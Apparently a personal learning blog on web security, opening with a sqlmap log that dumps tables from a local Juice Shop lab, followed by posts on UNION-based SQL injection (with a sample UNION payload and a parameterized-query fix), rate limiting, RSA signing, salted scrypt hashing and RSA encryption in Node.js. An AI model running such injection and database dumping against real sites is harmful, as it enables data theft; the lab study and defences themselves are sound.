[23:07:37] [INFO] retrieved: '15','0','2022-01-25 02:53:33.953 +00:00','15','2022...
[23:07:37] [INFO] retrieved: '16','100','2022-01-25 02:53:33.953 +00:00','16','20...
[23:07:37] [INFO] retrieved: '17','200','2022-01-25 02:53:33.953 +00:00','17','20...
[23:07:37] [INFO] retrieved: '18','0','2022-01-25 02:53:33.953 +00:00','18','2022...
[23:07:37] [INFO] retrieved: '19','0','2022-01-25 02:53:33.953 +00:00','19','2022...
[23:07:37] [INFO] retrieved: '20','0','2022-01-25 02:53:33.953 +00:00','20','2022...
Database: <current>                                                                
Table: Wallets
[20 entries]
+----+--------+---------+--------------------------------+--------------------------------+
| id | UserId | balance | updatedAt                      | createdAt                      |
+----+--------+---------+--------------------------------+--------------------------------+
| 1  | 1      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 2  | 2      | 100     | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 3  | 3      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 4  | 4      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 5  | 5      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 6  | 6      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 7  | 7      | 100     | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 8  | 8      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 9  | 9      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 10 | 10     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 11 | 11     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 12 | 12     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 13 | 13     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 14 | 14     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 15 | 15     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 16 | 16     | 100     | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 17 | 17     | 200     | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 18 | 18     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 19 | 19     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 20 | 20     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
+----+--------+---------+--------------------------------+--------------------------------+

[23:07:37] [INFO] table 'SQLite_masterdb.Wallets' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Wallets.csv'                 
[23:07:37] [INFO] fetching columns for table 'Memories' 
[23:07:37] [INFO] fetching entries for table 'Memories'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Memories' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'sqlite_sequence' 
[23:07:37] [INFO] fetching entries for table 'sqlite_sequence'
Database: <current>
Table: sqlite_sequence
[17 entries]
+-----+-------------------+
| seq | name              |
+-----+-------------------+
| 14  | SecurityQuestions |
| 20  | Users             |
| 19  | SecurityAnswers   |
| 6   | Addresses         |
| 6   | Cards             |
| 8   | Feedbacks         |
| 100 | Challenges        |
| 44  | Products          |
| 5   | Baskets           |
| 8   | BasketItems       |
| 1   | Complaints        |
| 9   | Recycles          |
| 44  | Quantities        |
| 20  | Wallets           |
| 3   | Deliveries        |
| 5   | Memories          |
| 2   | Captchas          |
+-----+-------------------+

[23:07:37] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/sqlite_sequence.csv' 
[23:07:37] [INFO] fetching columns for table 'Baskets' 
[23:07:37] [INFO] fetching entries for table 'Baskets'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Baskets' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'PrivacyRequests' 
[23:07:37] [INFO] fetching entries for table 'PrivacyRequests'
[23:07:37] [WARNING] unable to retrieve the entries for table 'PrivacyRequests' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'Challenges' 
[23:07:37] [INFO] fetching entries for table 'Challenges'
[23:07:40] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:40] [WARNING] unable to retrieve the entries for table 'Challenges' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Complaints' 
[23:07:40] [INFO] fetching entries for table 'Complaints'
[23:07:40] [WARNING] unable to retrieve the entries for table 'Complaints' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Quantities' 
[23:07:40] [INFO] fetching entries for table 'Quantities'
Database: <current>                                                                
Table: Quantities
[12 entries]
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| id | ProductId | quantity | updatedAt                      | createdAt                      | limitPerUser |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| 1  | 1         | 69       | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5            |
| 5  | 5         | 71       | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5            |
| 7  | 7         | 48       | 2022-01-25 02:53:33.859 +00:00 | 2022-01-25 02:53:33.859 +00:00 | 5            |
| 20 | 20        | 5        | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5            |
| 24 | 24        | 35       | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5            |
| 33 | 33        | 3        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 38 | 38        | 0        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 39 | 39        | 51       | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 5            |
| 40 | 40        | 2        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 41 | 41        | 1        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 43 | 43        | 3        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 44 | 44        | 38       | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+

[23:07:41] [INFO] table 'SQLite_masterdb.Quantities' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Quantities.csv'           
[23:07:41] [INFO] fetching columns for table 'Products' 
[23:07:41] [INFO] fetching entries for table 'Products'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Products' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Deliveries' 
[23:07:42] [INFO] fetching entries for table 'Deliveries'
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] unable to retrieve the entries for table 'Deliveries' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Captchas' 
[23:07:42] [INFO] fetching entries for table 'Captchas'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Captchas' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Cards' 
[23:07:42] [INFO] fetching entries for table 'Cards'
[23:07:43] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:43] [WARNING] unable to retrieve the entries for table 'Cards' in database 'SQLite_masterdb'                                                                     
[23:07:43] [INFO] fetching columns for table 'BasketItems' 
[23:07:43] [INFO] fetching entries for table 'BasketItems'
[23:07:43] [WARNING] unable to retrieve the entries for table 'BasketItems' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'SecurityAnswers' 
[23:07:43] [INFO] fetching entries for table 'SecurityAnswers'
[23:07:43] [WARNING] unable to retrieve the entries for table 'SecurityAnswers' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'Feedbacks' 
[23:07:43] [INFO] fetching entries for table 'Feedbacks'
Database: <current>                                                                
Table: Feedbacks
[3 entries]
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | UserId | 255 | rating | comment                                                                          | updatedAt                      | createdAt                      |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1  | 1      | 255 | 5      | I love this shop! Best products in town! Highly recommended! (***in@juice-sh.op) | 2022-01-25 02:53:33.307 +00:00 | 2022-01-25 02:53:33.307 +00:00 |
| 2  | 2      | 255 | 4      | Great shop! Awesome service! (***@juice-sh.op)                                   | 2022-01-25 02:53:33.310 +00:00 | 2022-01-25 02:53:33.310 +00:00 |
| 3  | 3      | 255 | 1      | Nothing useful available here! (***der@juice-sh.op)                              | 2022-01-25 02:53:33.312 +00:00 | 2022-01-25 02:53:33.312 +00:00 |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+

[23:07:44] [INFO] table 'SQLite_masterdb.Feedbacks' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Feedbacks.csv'             
[23:07:44] [INFO] fetching columns for table 'Users' 
[23:07:44] [INFO] fetching entries for table 'Users'
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] unable to retrieve the entries for table 'Users' in database 'SQLite_masterdb'                                                                     
[23:07:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 359 times
[23:07:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'                                                             

[*] ending @ 23:07:44 /2022-01-24/

reference:


Saturday, January 22, 2022


sql injection union command

SELECT * FROM sqlinjection.login
WHERE id=1
UNION SELECT * FROM sqlinjection.login;

data leaked by union command

sql injection with union command in search query to obtain table columns info

search found bob

sql injection with union command failed
//index.js

// Express application for the SQL-injection demo; the server is started on
// `port` further down in this file.
const express = require('express');
const bodyParser = require('body-parser');

const app = express();
const port = 8080;

// Parse JSON and URL-encoded request bodies before any route handler runs
// (`extended: true` selects body-parser's richer, nested-key URL decoding).
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

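// MySQL connection for the demo database.
// Connection settings are taken from the environment when present (variable
// names chosen here: DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); the literal
// fallbacks keep the original lab configuration working. Those fallbacks are a
// hard-coded credential in source — outside the lab, set the env vars and
// drop the literals. An empty env value falls back to the default on purpose.
const mysql = require('mysql');
const connection = mysql.createConnection({
    host: process.env.DB_HOST || '127.0.0.1',
    user: process.env.DB_USER || 'dvwa',
    password: process.env.DB_PASSWORD || 'p@ssw0rd',
    database: process.env.DB_NAME || 'sqlinjection',
});

// Connect eagerly at module load; connection errors surface from the driver
// on first use (no callback is attached here, as in the original).
connection.connect();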

//render html
app.set('view engine', 'ejs');
app.engine('html', require('ejs').renderFile);

app.get('/', function (req, res) {
    res.render('index');
});

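// Search endpoint used by the union-injection demo.
// Looks up login rows by exact name. The value is bound through a `?`
// placeholder, so the driver escapes it and it can only ever be compared as
// data against the `name` column — a UNION payload in `q` stays literal text.
app.all('/search/', function (req, res) {
    const q = req.query.q;

    // No query, or a non-string value (e.g. `?q[]=x`, which the query parser
    // turns into an array/object) -> just show the search page again.
    if (typeof q !== 'string' || q === '') {
        res.render('index');
        return;
    }

    connection.query('SELECT * from login where name = ?', [q], function (err, rows) {
        // Throwing inside the driver callback would be an uncaught exception
        // and take the whole process down. Log server-side and answer 500
        // without echoing driver details to the client.
        if (err) {
            console.error('search query failed:', err);
            res.status(500).send('search failed');
            return;
        }
        res.send(rows);
    });
});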

// Start the HTTP server on the configured port.
app.listen(port, function () {
    console.log(`Example app listening at http://localhost:${port}`);
});

reference:

prevention:
  1. Do not build SQL queries by string concatenation. This is where the hackers manipulate the SQL query to expose data, so never concatenate user input into a SQL query.
  2. Always use the prepared-statement approach (the question-mark placeholder approach).
  3. The advantage of the question-mark placeholder is that the input is only ever compared as data against that particular column. Even if the hackers modify the input, the modified value is still compared with only that one column, so it does not expose the data.

Wednesday, January 19, 2022

limit repeated requests to public APIs

If requests exceed the limit, the server blocks the request.


The limit, the remaining limit, and the limit reset time are in the response headers.
If multiple users are online, the current user's limit is not affected by others'.
Usage is tracked by IP address.
//index.js
const express = require('express')
const rateLimit = require('express-rate-limit')
const app = express();
const PORT = 3000;

// Rate-limit rule: at most 3 requests per client IP within each 1-minute
// window (the window is given in milliseconds).
// NOTE(review): the limiter keys on the client address Express sees; behind a
// reverse proxy that is the proxy's address unless Express's 'trust proxy'
// setting is configured, so all clients would then share one bucket.
const ONE_MINUTE_MS = 60 * 1000;
const apiRequestLimiter = rateLimit({
    windowMs: ONE_MINUTE_MS,
    max: 3,
});

// Apply the rule to every route as application-level middleware.
app.use(apiRequestLimiter);

// The single demo route; every request to it counts against the limiter.
app.get('/', (req, res) => res.send('Hello World'));

// Start listening on PORT.
app.listen(PORT, function () {
    console.log(`server started on port ${PORT}`);
});

reference:


Tuesday, January 18, 2022

RSA signature

node sign.js
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
Verified: true

//sign.js
const { createSign, createVerify } = require('crypto');
const { publicKey, privateKey } = require('./keypair');

const message = 'this data must be signed';

// Produce a hex-encoded RSA-SHA256 signature of `data` using `key`
// (the private half of the pair from ./keypair).
const signWith = (key, data) => {
    const signer = createSign('rsa-sha256');
    signer.update(data);
    return signer.sign(key, 'hex');
};

// Check a hex-encoded signature of `data` against `key` (the public half);
// returns true only when the signature verifies.
const verifyWith = (key, data, hexSignature) => {
    const verifier = createVerify('rsa-sha256');
    verifier.update(data);
    return verifier.verify(key, hexSignature, 'hex');
};

/// SIGN
const signature = signWith(privateKey, message);
console.log(signature);

/// VERIFY
const isVerified = verifyWith(publicKey, message, signature);
console.log(`Verified: ${isVerified}`);

reference:

Sunday, January 16, 2022

salt in encryption

A salt adds randomness to hashing: a precomputed hash dictionary for a known algorithm no longer works for cracking hashes once a salt is added. The salt and the password hash are stored together in the database, separated by a colon (:).

PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node salt.js
{
  email: 'bob@gmail.com',
  password: '5b0caa7a0764e99a1ca2472e72e8cf5c:87d3f6b38f2ce30423bdaf9bc1dfe80329fce6c5ff061d040a8d59f369ba49178022833abdf1c88debb4b133ba085724a0379fcf608889395401e058c7c044cd'
}
login success!
login fail!
PS C:\Users\zchen\Programming\node-crypto-examples-main\src> 

 //salt.js

const { scryptSync, randomBytes, timingSafeEqual } = require('crypto');

// In-memory user store shared by signup() and login(); each entry is
// { email, password: '<salt-hex>:<scrypt-hash-hex>' }.
const users = []

// Register a user: derive a 64-byte scrypt hash of `password` using a fresh
// random salt (16 random bytes, hex-encoded — the hex string itself is what
// scrypt receives as the salt) and store both as 'salt:hash' so login() can
// re-derive the hash later. Returns the stored user record.
function signup(email, password) {
    const salt = randomBytes(16).toString('hex');
    const derivedKey = scryptSync(password, salt, 64);
    const record = {
        email,
        password: [salt, derivedKey.toString('hex')].join(':'),
    };
    users.push(record);
    return record;
}

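// Authenticate `email`/`password` against the in-memory store.
// Returns 'login success!' on a match and 'login fail!' otherwise — including
// when the email is unknown or the stored record is malformed, which
// previously surfaced as a TypeError (no user) or a RangeError from
// timingSafeEqual (hash length mismatch).
// NOTE(review): an unknown email returns before scrypt runs, so response time
// differs between known and unknown accounts; run a dummy derivation on that
// path if account enumeration matters for the caller.
function login(email, password) {
    const user = users.find((v) => v.email === email);
    if (!user || typeof user.password !== 'string') {
        return 'login fail!';
    }

    const [salt, key] = user.password.split(':');
    if (!salt || !key) {
        return 'login fail!';
    }

    const hashedBuffer = scryptSync(password, salt, 64);
    const keyBuffer = Buffer.from(key, 'hex');

    // timingSafeEqual throws on differing lengths; a stored hash that is not
    // 64 bytes cannot match anyway.
    if (keyBuffer.length !== hashedBuffer.length) {
        return 'login fail!';
    }

    // Constant-time comparison so the response time does not leak how many
    // leading bytes of the hash matched.
    return timingSafeEqual(hashedBuffer, keyBuffer) ? 'login success!' : 'login fail!';
}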

// Demo run: register bob, then try a correct and an incorrect password.
const newUser = signup('bob@gmail.com', '12345');
console.log(newUser);

for (const attempt of ['12345', '123']) {
    console.log(login('bob@gmail.com', attempt));
}

reference:


Saturday, January 15, 2022

RSA encryption

The public and private key pair changes every time the script runs and a message is sent: encrypt with the public key and decrypt with the private key.

PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node .\asymmetric-encrypt.js
public key:  -----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0luzMXYhpLCttFV3GBEK
J8vtPmaO4l8K6LlRMWRikSK3yWGlTlhBDlYhsBztebzT0n2eI7F2luXgozVWgE0I
iHyj4PaVek3lR1iJPK9wzg5VVtPGDDCWdW86i7XJZB7QcRa74gjAIeaUD/m0gK8t
USBt9Q1Z+tkT921mswsbLlS8pytzfm4DOhHnBhoJ93UZHx/LAHU7JrA6GHBtNnb0
p47lWkMN4K7KMFTB4uMht/ZSx+ciFzzKdZVItEvcUXFdDEoUkyXz03UvXe6yirFs
RSLqw5c5VFrDddBwPkHquvLvtj992TB1Hb5rU4R4ewir2AUHtww6E0FfWesSXYLw
NQIDAQAB
-----END PUBLIC KEY-----

private key:  -----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----

encryption:  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
decryption:  the british are coming!
PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node .\asymmetric-encrypt.js
public key:  -----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtRXqrm+JSuiqlMyS3ypk
2toXMlsuWxzg3vJWvvS1l/ijdTrsYRbE4JdQC218uG9nmMcLRtiF3C1GDDQDNkCK
mqOsniqEX87brXwD3kPc95dS0UoKYwRahxp4+8bEJd2lXXU/2GzH1B8oebFC640J
tZlrTdgcivM/qzArd8ai4j/Lv/UE89t5L3tDA9Vv8aJyoTYtKIv0g6iJG8jDYUxP
QSh6yZFySSkXdkAYGgJOaleRh05BektrDcLRUhCHMd4Y3RhvvKG7mCwGM2kwnNII
xIonaJmyM4RsjltP81uyclGmCI6RKVgoyeZlOteFe8tRCNjfQneZJQYDrENfQ+s6
cQIDAQAB
-----END PUBLIC KEY-----

private key:  -----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----

encryption:  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
decryption:  the british are coming!

------------------------------
//asymmetric-encrypt.js

const { publicEncrypt, privateDecrypt } = require('crypto');
const { publicKey, privateKey } = require('./keypair');

const message = 'the british are coming!';

const toHex = (buf) => buf.toString('hex');

// Encrypt with the public key; only the matching private key can recover it.
const encryptedData = publicEncrypt(publicKey, Buffer.from(message));

// Demo output. Printing the private key is acceptable in a lab script only —
// never log private key material in a real service.
console.log('public key: ', publicKey);
console.log('private key: ', privateKey);
console.log('encryption: ', toHex(encryptedData));

// Decrypt with the private key and print the recovered plaintext.
const decryptedData = privateDecrypt(privateKey, encryptedData);
console.log('decryption: ', decryptedData.toString('utf-8'));

--------------------------------
//keypair.js

const { generateKeyPairSync } = require('crypto');

// Generate a fresh 2048-bit RSA key pair each time this module is loaded (so
// every run of the demo scripts sees different keys) and export both halves
// as PEM strings.
const keyPair = generateKeyPairSync('rsa', {
  modulusLength: 2048, // key size in bits
  publicKeyEncoding: { type: 'spki', format: 'pem' }, // 'spki' recommended by the Node.js docs
  privateKeyEncoding: {
    type: 'pkcs8', // 'pkcs8' recommended by the Node.js docs
    format: 'pem',
    // To encrypt the private key at rest, add `cipher: 'aes-256-cbc'` plus a
    // `passphrase` here and supply the same passphrase wherever the key is used.
  },
});

module.exports = {
    publicKey: keyPair.publicKey,
    privateKey: keyPair.privateKey,
};

reference: